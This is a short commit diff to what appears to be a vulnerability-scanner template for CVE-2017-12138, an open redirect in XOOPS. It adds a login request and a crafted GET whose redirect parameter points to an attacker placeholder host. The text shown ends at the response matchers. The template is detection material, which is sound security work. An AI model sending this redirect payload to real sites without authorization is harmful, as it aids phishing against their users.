Update CVE-2017-12138.yaml

patch-1
Prince Chaddha 2022-05-24 15:08:29 +05:30 committed by GitHub
parent 98f2956561
commit de8267aa96
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 13 additions and 5 deletions

View File

@ -14,14 +14,22 @@ info:
cvss-score: 6.10
cve-id: CVE-2017-12138
cwe-id: CWE-601
tags: cve,cve2017,redirect,xoops
tags: cve,cve2017,redirect,xoops,authenticated
requests:
- method: GET
path:
- '{{BaseURL}}/xoops/modules/profile/index.php?op=main&xoops_redirect=https:www.attacker.com'
- raw:
- |
POST /user.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
stop-at-first-match: true
uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login
- |
GET /modules/profile/index.php?op=main&xoops_redirect=https:www.attacker.com HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: regex
part: header